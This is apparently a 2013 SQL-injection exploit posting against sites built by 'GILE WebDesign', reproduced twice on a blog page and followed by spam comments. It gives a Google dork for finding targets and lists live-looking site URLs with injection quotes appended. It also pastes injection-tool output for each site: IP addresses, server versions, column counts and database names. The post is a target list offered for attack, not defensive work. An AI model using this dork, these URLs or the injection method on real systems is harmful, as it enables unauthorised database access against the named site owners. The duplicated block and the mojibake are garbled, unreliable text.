X-------------------------------------------------------------X
_____ _ _ _ _ _____ _____ _____ ___ _ _ _______ _______ ___________
|_ _| | | | \ | |_ _/ ___|_ _|/ _ \ | \ | | / __ \ \ / / ___ \ ___| ___ \
| | | | | | \| | | | \ `--. | | / /_\ \| \| | | / \/\ V /| |_/ / |__ | |_/ /
| | | | | | . ` | | | `--. \ | | | _ || . ` | | | \ / | ___ \ __|| /
| | | |_| | |\ |_| |_/\__/ /_| |_| | | || |\ | | \__/\ | | | |_/ / |___| |\ \
\_/ \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/ \____/ \_/ \____/\____/\_| \_|
X-------------------------------------------------------------X
[+] Author: ZOULSZ404
[+] Exploit Title: GILE WebDesign SQL Injection Vulnerability
[+] Date: 29-11-2013
[+] Category: WebApp
[+] Google Dork: intext:"Design by GILE" inurl:php
[+] Tested on: Win7 , ubuntu 13.04
###############################################
Demos:
http://www.lufaXda.com.tw/product_list.php?CateId=1'
http://www.yafXod.com.tw/prodcate.php?CateId=3'
http://www.pXr.com.tw/bullhorn_detail.php?ActivityId=6
http://www.tgXsound.com.tw/news_detail.php?NId=16'
http://www.tgXsound.com.tw/news_detail.php?NId=16'
http://www.giXe.com.tw/work_list.php?Cate=2'
Host IP: 203.69.42.184
Web Server: Apache
Powered-by: PHP/5.2.11
Keyword Found: have
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 1
Valid String Column is 1
Current DB: DBL01767
Host IP: 122.147.44.136
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.2.12
Powered-by: PleskLin
Keyword Found: have
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 3
Valid String Column is 2
Current DB: DBL01643
Host IP: 60.199.166.69
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.2.13
Powered-by: PleskLin
Keyword Found:
「å°å°¼æ–‡åŒ&
;#8211;節-星光é–ƒ&#
232;€€ã€®å°ã€æ–°å&#
185;´ã€æ´»å‹•
Injection type is Integer
DB Server: MySQL >=5
Selected Column Count is 20
Current DB: phr
Host IP: 60.199.166.69
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.2.13
Powered-by: PleskLin
Keyword Found: have
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 17
Valid String Column is 2
Current DB: sound98k
Host IP: 122.147.44.136
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.2.12
Powered-by: PleskLin
Keyword Found: have
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 2
Valid String Column is 2
Current DB: gile
#############################################
_____ _ _ _ _ _____ _____ _____ ___ _ _ _______ _______ ___________
|_ _| | | | \ | |_ _/ ___|_ _|/ _ \ | \ | | / __ \ \ / / ___ \ ___| ___ \
| | | | | | \| | | | \ `--. | | / /_\ \| \| | | / \/\ V /| |_/ / |__ | |_/ /
| | | | | | . ` | | | `--. \ | | | _ || . ` | | | \ / | ___ \ __|| /
| | | |_| | |\ |_| |_/\__/ /_| |_| | | || |\ | | \__/\ | | | |_/ / |___| |\ \
\_/ \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/ \____/ \_/ \____/\____/\_| \_|
X-------------------------------------------------------------X
[+] Author: ZOULSZ404
[+] Exploit Title: GILE WebDesign SQL Injection Vulnerability
[+] Date: 29-11-2013
[+] Category: WebApp
[+] Google Dork: intext:"Design by GILE" inurl:php
[+] Tested on: Win7 , ubuntu 13.04
###############################################
Demos:
http://www.lufaXda.com.tw/product_list.php?CateId=1'
http://www.yafXod.com.tw/prodcate.php?CateId=3'
http://www.pXr.com.tw/bullhorn_detail.php?ActivityId=6
http://www.tgXsound.com.tw/news_detail.php?NId=16'
http://www.tgXsound.com.tw/news_detail.php?NId=16'
http://www.giXe.com.tw/work_list.php?Cate=2'
Host IP: 203.69.42.184
Web Server: Apache
Powered-by: PHP/5.2.11
Keyword Found: have
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 1
Valid String Column is 1
Current DB: DBL01767
Host IP: 122.147.44.136
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.2.12
Powered-by: PleskLin
Keyword Found: have
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 3
Valid String Column is 2
Current DB: DBL01643
Host IP: 60.199.166.69
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.2.13
Powered-by: PleskLin
Keyword Found:
「å°å°¼æ–‡åŒ&
;#8211;節-星光é–ƒ&#
232;€€ã€®å°ã€æ–°å&#
185;´ã€æ´»å‹•
Injection type is Integer
DB Server: MySQL >=5
Selected Column Count is 20
Current DB: phr
Host IP: 60.199.166.69
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.2.13
Powered-by: PleskLin
Keyword Found: have
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 17
Valid String Column is 2
Current DB: sound98k
Host IP: 122.147.44.136
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.2.12
Powered-by: PleskLin
Keyword Found: have
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 2
Valid String Column is 2
Current DB: gile
#############################################
we are worlds best web design firm and digital marketing agency which offers high end web design and development services at optimal cost. We also provides digital marketing services all over the world.
ReplyDeleteI got too much interesting stuff on your blog. I guess I am not the only one having all the enjoyment here! Keep up the good work. Webdesign Buxtehude
ReplyDelete